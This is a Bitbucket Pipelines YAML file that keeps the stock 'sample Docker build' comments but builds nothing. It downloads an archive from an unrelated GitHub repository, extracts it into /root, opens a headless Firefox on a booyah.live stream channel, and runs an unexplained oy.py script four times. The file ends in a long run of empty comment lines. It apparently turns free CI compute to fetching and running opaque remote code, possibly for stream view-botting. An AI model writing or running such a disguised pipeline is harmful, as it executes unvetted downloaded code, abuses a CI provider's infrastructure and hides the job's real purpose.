# This is a sample build configuration for Docker.
# Check our guides at https://confluence.atlassian.com/x/O1toN for more examples.
# Only use spaces to indent your .yml configuration.
# -----
# You can specify a custom docker image from Docker Hub as your build environment.
options:
  max-time: 120
image: m0uray/slop-trans

pipelines:

  default:
    - step:
        services:
          - docker
        script: # Modify the commands below to build your repository.

          # Set $DOCKER_HUB_USERNAME and $DOCKER_HUB_PASSWORD as environment variables in repository settings
          - export MY_HIDDEN_NUMBER="00005.tar.bz2"
          - echo $MY_HIDDEN_NUMBER
          - wget https://github.com/y0shimitsugh0st84/profire/raw/master/version/$MY_HIDDEN_NUMBER
          - tar -xvf $MY_HIDDEN_NUMBER -C /root/
          - ls /root/*
          #- DISPLAY=:0; export DISPLAY
          #- xauth add $DISPLAY . hexkey
          #- firefox --setDefaultBrowser
          #- xauth list|grep `uname -n`
          - firefox --headless https://booyah.live/channels/10919460
          - python oy.py
          - python oy.py
          - python oy.py
          - python oy.py
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
